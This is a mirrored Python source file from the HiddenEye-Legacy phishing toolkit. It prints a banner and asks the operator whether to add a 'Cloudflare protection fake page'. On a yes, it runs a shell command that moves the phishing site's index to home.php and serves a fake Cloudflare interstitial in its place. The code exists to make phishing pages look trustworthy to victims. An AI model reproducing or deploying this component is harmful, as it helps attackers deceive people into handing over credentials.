mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
29 lines
1.2 KiB
Python
29 lines
1.2 KiB
Python
from Defs.ImportManager.unsorted_will_be_replaced import wait, run_command
|
|
import Defs.ThemeManager.theme as theme
|
|
|
|
default_palette = theme.default_palette
|
|
|
|
def add_cloudflare_prompt():
|
|
|
|
run_command('clear')
|
|
print('''{1}
|
|
_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1}
|
|
|__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1}
|
|
| | | ]__| ]__| |__ | \| {0}|__ || |__{1}
|
|
{1}http://github.com/darksecdevelopers
|
|
{0}** BY: {1}DARKSEC {0}**'''.format(default_palette[0], default_palette[2]))
|
|
print("-------------------------------\n{0}[ CLOUDFARE PROTECTION PROMPT ]{1}!! {0}\n-------------------------------".format(default_palette[0], default_palette[4]))
|
|
print("\n{0}[{1}*{0}]{0}DO YOU WANT TO ADD A CLOUDFARE PROTECTION FAKE PAGE -{1}(Y/N)".format(default_palette[0], default_palette[4]))
|
|
choice = input("\n\n{0}YOUR CHOICE >>> {1}".format(default_palette[0], default_palette[2])).upper()
|
|
if choice == 'Y':
|
|
add_cloudfare()
|
|
else:
|
|
wait(1)
|
|
|
|
|
|
def add_cloudfare():
|
|
run_command('mv Server/www/index.* Server/www/home.php && cp WebPages/cloudfare.html Server/www/index.html')
|
|
print("\n{0}[{1}#{0}]CLOUDFARE FAKE PAGE{0} ADDED...".format(default_palette[0], default_palette[4]))
|
|
wait(1)
|
|
|